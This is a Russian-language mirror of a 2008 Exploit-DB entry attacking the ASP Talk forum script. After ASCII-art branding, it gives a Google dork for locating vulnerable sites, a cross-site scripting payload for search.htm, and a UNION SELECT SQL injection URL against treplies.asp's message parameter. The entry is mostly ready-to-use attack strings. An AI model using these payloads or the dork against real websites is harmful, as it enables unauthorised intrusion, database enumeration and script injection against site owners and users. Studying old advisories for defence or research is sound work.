- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7378
- Проверка EDB
-
- Пройдено
- Автор
- BL@CKBE@RD
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2008-12-07
Код:
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
[+] Script : ASP Talk
[+] Exploit Type : Multiple Exploits (SQL/CSS)
[+] Google Dork : inurl:treplies.asp?message= intitle:ASP Talk
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
1)Cross site scripting :
http://[website]/[script]/search.htm
post = <script>alert('Bl@clbe@rD Is Here')</script>
2) Remote sql injection Exploit :
http://[website]/[script]/treplies.asp?message=20814+union+select+1,2,3,4,5,6,7,8+from+msysobjects
[peace xD]
# milw0rm.com [2008-12-07]- Источник
- www.exploit-db.com
